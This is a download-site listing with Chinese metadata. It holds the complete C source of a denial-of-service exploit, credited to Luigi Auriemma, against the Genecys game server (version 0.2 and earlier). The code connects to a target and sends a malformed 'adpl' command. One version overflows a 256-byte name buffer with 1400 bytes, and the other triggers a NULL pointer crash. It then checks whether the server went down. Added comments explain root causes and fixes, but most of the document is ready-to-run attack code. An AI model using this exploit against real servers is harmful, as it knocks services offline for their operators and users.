软件名称: |
genecysbof.zip |
文件类型: |
|
|
界面语言: |
简体中文 |
软件类型: |
国产软件 |
运行环境: |
WinNT/2K/Xp |
授权方式: |
共享软件 |
软件大小: |
8K |
发布时间: |
2006-05-15 |
官方网址: |
http://www.milw0rm.com 作者:Luigi |
演示网址: |
|
软件说明: |
|
Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
/* Tool version string, printed in the start-up banner. */
#define VER "0.1"
/* Default TCP port, used when no port argument is given on the command line. */
#define PORT 5501
/* Size of the local scratch buffer shared by the send and receive helpers. */
#define BUFFSZ 8192 // max
/*
 * Length of the oversized "nm" value used by the overflow test case.
 * Per the author's note the server-side destination buffer is 256 bytes, so
 * the root cause is a copy with no length check; the server-side fix is a
 * bounded copy (or rejecting over-long fields before they are copied).
 */
#define BOFSZ 1400 // too big, dest buffer is 256
/* Formats "<cmd> <name>:<value> ..." plus a trailing '\r' into buff and sends it. */
void genecys_send(int sd, u_char *buff, u_char *cmd, ...);
/* Reads one '\r'-terminated line (at most size - 1 bytes) into buff. */
int genecys_recv(int sd, u_char *buff, int size);
/* Unbounded NUL-terminated copy; returns the number of bytes copied. */
int mycpy(u_char *dst, u_char *src);
/* Dotted-quad or host name -> IPv4 address in network byte order. */
u_int resolv(char *host);
/* Prints the last socket/system error and exits. */
void std_err(void);
/*
 * Test driver for two denial-of-service conditions in the Genecys server
 * (<= 0.2 according to the banner below).
 *
 * argv[1]  test case: 2 selects the parse_command NULL pointer case, any
 *          other value selects the tell_player_surr_changes overflow case
 * argv[2]  host name or dotted-quad address
 * argv[3]  optional TCP port (defaults to PORT)
 *
 * Flow: connect, read the greeting line, send one "adpl" command, wait,
 * then try to connect again and treat a failed connect as "server crashed".
 *
 * Defender's view of the two root causes, as far as this file shows them:
 *  - overflow case: a name ("nm") value far longer than the 256-byte
 *    destination noted next to BOFSZ; the server needs a length check or a
 *    bounded copy before the value is stored.
 *  - NULL pointer case: a field sent without the ':' separator; the server's
 *    parser needs to reject such a field instead of dereferencing the
 *    missing value.
 * Both are visible on the wire as malformed "adpl" commands, which is what an
 * input filter or IDS rule in front of the service can match on.
 *
 * Returns 0 after printing the verdict; exits with status 1 on usage or
 * socket errors.
 */
int main(int argc, char *argv[]) {
// NOTE(review): peer is never zeroed, so sin_zero holds stack garbage.
struct sockaddr_in peer;
int sd,
attack,
i;
u_short port = PORT;
u_char buff[BUFFSZ],
bof[BOFSZ];
#ifdef WIN32
// Winsock must be initialised before any socket call; the result is not checked here.
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
// Unbuffered stdout so progress lines appear immediately.
setbuf(stdout, NULL);
fputs("\n"
"Genecys <= 0.2 buffer-overflow and NULL pointer crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attack:\n"
" 1 = tell_player_surr_changes buffer-overflow\n"
" 2 = parse_command NULL pointer crash\n"
"\n", argv[0], port);
exit(1);
}
// NOTE(review): atoi() reports no errors; a non-numeric selector becomes 0
// and therefore runs the overflow case, and an out-of-range port is
// silently truncated to u_short.
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect ...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
// Read and echo the server's greeting line; the returned length is ignored.
genecys_recv(sd, buff, sizeof(buff));
printf("- %s\n", buff);
if(attack == 2) {
printf("- parse_command NULL pointer crash\n");
// Sends "adpl nm\r": a field name with no ':' and no value.
genecys_send(
sd,
buff,
"adpl",
"nm", // no ':'!!!
NULL);
} else {
printf("- tell_player_surr_changes buffer-overflow\n");
// Fill the name value with BOFSZ - 1 filler bytes and NUL-terminate it.
memset(bof, 'a', sizeof(bof) - 1);
bof[sizeof(bof) - 1] = 0;
// Sends "adpl nm:<filler> user:myusername pass:mypassword\r".
genecys_send(
sd,
buff,
"adpl",
"nm", bof,
"user", "myusername",
"pass", "mypassword",
NULL);
}
// Give the server time to process the command before probing it again.
// sleep() maps to Sleep() (milliseconds) on WIN32, hence ONESEC.
printf("- wait some seconds:\n");
for(i = 3; i; i--) {
printf("%d\r", i);
sleep(ONESEC);
}
close(sd);
sleep(ONESEC);
// Liveness probe: a second connect to the same address and port.
// NOTE(review): any connect failure (packet filter, network fault, listen
// backlog) is reported as "vulnerable", and a server that is restarted by a
// supervisor would be reported as not vulnerable; confirm the result
// against the server's own logs or a crash dump.
printf("- check server:\n");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server doesn't seem vulnerable\n\n");
}
close(sd);
return(0);
}
/*
 * Serialises one Genecys command into buff and writes it to the socket.
 *
 * sd    connected TCP socket
 * buff  caller-supplied scratch buffer; no size is passed in, so the caller
 *       must make sure the command plus all fields fit
 * cmd   command keyword
 * ...   NULL-terminated list of u_char * strings, alternating field name and
 *       field value
 *
 * Wire format: "<cmd> <name>:<value> <name>:<value>...\r". Separators are
 * chosen purely by argument position (even -> ' ', odd -> ':'), which is what
 * allows a trailing field name to be sent with no ':' and no value.
 * Calls std_err() (which exits) if send() fails.
 */
void genecys_send(int sd, u_char *buff, u_char *cmd, ...) {
    va_list args;
    u_char  *field;
    u_char  *out = buff + mycpy(buff, cmd);
    int     idx = 0;

    va_start(args, cmd);
    while((field = va_arg(args, u_char *)) != NULL) {
        /* even position: start of a new field; odd position: its value */
        if(idx & 1) {
            *out++ = ':';
        } else {
            *out++ = ' ';
        }
        out += mycpy(out, field);
        idx++;
    }
    va_end(args);

    /* commands are terminated by a bare carriage return */
    *out++ = '\r';

    if(send(sd, buff, out - buff, 0) < 0) std_err();
}
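/*
 * Reads one '\r'-terminated line from the socket, one byte at a time.
 *
 * sd    connected TCP socket
 * buff  destination buffer
 * size  capacity of buff in bytes, including room for the terminating NUL
 *
 * Stops at the first '\r' (which is replaced by the NUL terminator), when the
 * peer closes the connection, or when size - 1 bytes have been stored.
 * Returns the number of bytes stored before the terminator. Calls std_err()
 * (which exits) if recv() fails.
 *
 * The data comes from the remote peer, so the capacity is enforced here: a
 * NULL buffer or a size <= 0 returns 0 without touching memory. The original
 * loop decremented size before testing it, so a size of 0 turned into -1 and
 * the loop wrote past the end of the buffer.
 */
int genecys_recv(int sd, u_char *buff, int size) {
    int got;
    int len = 0;

    if(!buff || size <= 0) return(0);

    /* keep one byte in reserve for the terminator */
    while(len < size - 1) {
        got = recv(sd, buff + len, 1, 0);
        if(got < 0) std_err();
        if(!got) break;                 /* orderly shutdown by the peer */
        if(buff[len] == '\r') break;    /* end of line */
        len++;
    }

    buff[len] = 0;
    return(len);
}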
/*
 * Copies the NUL-terminated string src to dst, terminator included.
 *
 * Returns the number of bytes copied, not counting the terminator, so callers
 * can advance their write pointer by the return value.
 *
 * There is no bound on the copy: the caller is responsible for making sure
 * dst has room for the whole of src plus one byte.
 */
int mycpy(u_char *dst, u_char *src) {
    int idx = 0;

    while(src[idx]) {
        dst[idx] = src[idx];
        idx++;
    }
    dst[idx] = 0;

    return(idx);
}
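/*
 * Converts a dotted-quad string or a host name to an IPv4 address.
 *
 * host  NUL-terminated address or name
 *
 * Returns the address in network byte order. If the name cannot be resolved
 * to an IPv4 address, prints an error and exits with status 1.
 *
 * The address bytes are copied out of the hostent with memcpy() rather than
 * read through a cast pointer: h_addr_list entries are char *, so reading
 * them as u_int is an aliasing violation and may be a misaligned access. The
 * address family and length are checked first so that a non-IPv4 answer is
 * never copied into the 4-byte result.
 */
u_int resolv(char *host) {
    struct hostent *hp;
    u_int          host_ip;

    /* numeric form first: no resolver lookup needed */
    host_ip = inet_addr(host);
    if(host_ip != INADDR_NONE) return(host_ip);

    hp = gethostbyname(host);
    if(!hp
      || (hp->h_addrtype != AF_INET)
      || (hp->h_length != (int)sizeof(host_ip))
      || !hp->h_addr_list[0]) {
        printf("\nError: Unable to resolv hostname (%s)\n", host);
        exit(1);
    }

    memcpy(&host_ip, hp->h_addr_list[0], sizeof(host_ip));
    return(host_ip);
}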
#ifndef WIN32
/*
 * Fatal-error helper for the non-Windows build (the WIN32 build takes its
 * std_err() from "winerr.h" instead).
 *
 * Prints "Error: <description of errno>" on stderr, preceded by a blank
 * line, and terminates the process with exit status 1. Never returns.
 */
void std_err(void)
{
    perror("\nError");
    exit(1);
}
#endif |